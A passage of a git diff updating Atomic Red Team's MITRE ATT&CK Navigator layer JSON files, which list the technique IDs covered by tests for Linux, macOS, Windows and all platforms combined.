+{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1
136.001","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
index f59256bf..74157231 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqu
eID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1551.002","score":100,"enabled":true},{"techniqueID":"T1551.003","score":100,"enabled":true},{"techniqueID":"T1551.004","score":100,"enabled":true},{"techniqueID":"T1551.006","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"
techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index b92a62d7..56dfa32f 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID"
:"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"te
chniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.015","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID
":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1551.001","score":100,"enabled":true},{"techniqueID":"T1551.004","score":100,"enabled":true},{"techniqueID":"T1551.005","score":100,"enabled":true},{"techniqueID":"T1551.006","score":100,"enabled":true},{"techniqueID":"T1551","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":
true}]}
\ No newline at end of file
+{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID"
:"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":tr
ue},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T
1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.015","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":
true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 41fb8588..92123d49 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1
053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enab